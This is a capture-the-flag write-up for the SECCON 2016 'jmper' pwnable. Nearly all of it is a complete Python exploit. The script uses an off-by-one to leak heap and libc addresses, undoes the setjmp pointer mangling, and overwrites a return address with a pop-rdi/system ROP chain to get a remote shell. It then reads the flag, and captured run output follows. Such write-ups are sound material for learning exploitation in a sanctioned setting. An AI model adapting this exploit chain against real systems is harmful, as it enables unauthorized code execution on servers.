SECCON CTF QUAL 2016 - jmper
Category : Pwnables
jmperSummary : off by one to rop, setjmp
Exploit
|
#!/usr/bin/python from socket import * from struct import pack, unpack import time def rc(s, ch): res = '' while ch not in res: res += s.recv(1) return res #def ror64(value, count): def ROR(data, shift, size=64): shift %= size body = data >> shift remains = (data << (size - shift)) - (body << size) return (body + remains) p = lambda x : pack("<Q", x) up = lambda x : unpack("<Q", x)[0] HOST = '127.0.0.1' PORT = 9999 HOST = 'jmper.pwn.seccon.jp' PORT = 5656 libc_start_main_got = 0x601FB0 def add_student(s): s.send('1\n') def name_student(s, idx, name): s.send('2\n') rc(s, 'ID:') s.send(str(idx) + '\n') rc(s, 'Input name:') s.send(name) def memo_student(s, idx, memo): s.send('3\n') rc(s, 'ID:') s.send(str(idx) + '\n') rc(s, 'Input memo:') s.send(memo) def show_name(s, idx): s.send('4\n') rc(s, 'ID:') s.send(str(idx) + '\n') return rc(s, '1. Add')[:-6] def show_memo(s, idx): s.send('5\n') rc(s, 'ID:') s.send(str(idx) + '\n') return rc(s, '1. Add')[:-6] s = socket(AF_INET, SOCK_STREAM) s.connect((HOST, PORT)) raw_input(">>") rc(s, '6. Bye :)\n') add_student(s) # 0 rc(s, '6. Bye :)\n') add_student(s) # 0 rc(s, '6. Bye :)\n') memo_student(s, 0, 'a'*32 + '\x08') rc(s, '6. Bye :)\n') heap_leak = up(show_name(s, 0).ljust(8, '\x00')) print 'heap leak : ', hex(heap_leak) jmp_buf = heap_leak - 0xf8 + 0x30 #(rsp, rip) rc(s, '6. Bye :)\n') memo_student(s, 0, 'a'*32 + '\x78') rc(s, '6. Bye :)\n') name_student(s, 0, p(jmp_buf)+'\n') rc(s, '6. Bye :)\n') rsp_rip = show_name(s, 1)[:16] rsp = up(rsp_rip[:8]) rip = up(rsp_rip[8:]) fs_val = ROR(rip, 0x11, 64) ^ 0x0400C31 rsp = ROR(rsp, 0x11, 64) ^ fs_val print 'rsp : ', hex(rsp) # ror 0x11 ^ fs[0x30] rc(s, '6. Bye :)\n') name_student(s, 0, p(libc_start_main_got)+'\n') rc(s, '6. Bye :)\n') libc_start_main_libc = up(show_name(s, 1)[:8].ljust(8, '\x00')) libc_base = libc_start_main_libc - 0x000000000021e50 system_libc = libc_base + 0x0000000000046590 pop_rdi = libc_base + 0x0000000000022b9a # 0000000000046590 <__libc_system@@GLIBC_PRIVATE>: # 0000000000021e50 <__libc_start_main@@GLIBC_2.2.5>: # 0000000000022b9a : pop rdi ; ret print 'libc_start_main_libc : ', hex(libc_start_main_libc) print 'system_libc : ', hex(system_libc) payload ='' payload += p(pop_rdi) payload += p(heap_leak+0x50) payload += p(system_libc) # overwrite ret rc(s, '6. Bye :)\n') name_student(s, 0, p(rsp + 0x18)+'\n') rc(s, '6. Bye :)\n') name_student(s, 1, payload+'\n') # for arg "sh" rc(s, '6. Bye :)\n') memo_student(s, 1, "sh"+'\n') for i in range(0, 29 - 2): rc(s, '6. Bye :)\n') add_student(s) # 0 time.sleep(0.1) s.send('ls -l\n') time.sleep(0.1) raw_input('> ') print s.recv(1024) s.send('cat flag\n') raw_input('> ') print s.recv(1024) s.close() """ pwn3r$ python jmper_exploit.py >> heap leak : 0x239a208 rsp : 0x7ffe73389820L libc_start_main_libc : 0x7fcf6c59ee50 system_libc : 0x7fcf6c5c3590 > 1. Add student. 2. Name student. 3. Write memo 4. Show Name 5. Show memo. 6. Bye :) 1. Add student. 2. Name student. 3. Write memo 4. Show Name 5. Show memo. 6. Bye :) Exception has occurred. Jump! Nice jump! Bye :) total 20 -r--r--r-- 1 root root 32 Dec 8 16:20 flag -rwxr-xr-x 1 root root 13044 Dec 8 15:30 jmper
> Traceback (most recent call last): File "jmper_exploit.py", line 138, in <module> print s.recv(1024) pwn3r$ python jmper_exploit.py >> heap leak : 0x78e208 rsp : 0x7ffd5c7655e0L libc_start_main_libc : 0x7f6915ae2e50 system_libc : 0x7f6915b07590 > 1. Add student. 2. Name student. 3. Write memo 4. Show Name 5. Show memo. 6. Bye :) 1. Add student. 2. Name student. 3. Write memo 4. Show Name 5. Show memo. 6. Bye :) Exception has occurred. Jump! Nice jump! Bye :)
> SECCON{3nj0y_my_jmp1n9_serv1ce} """ |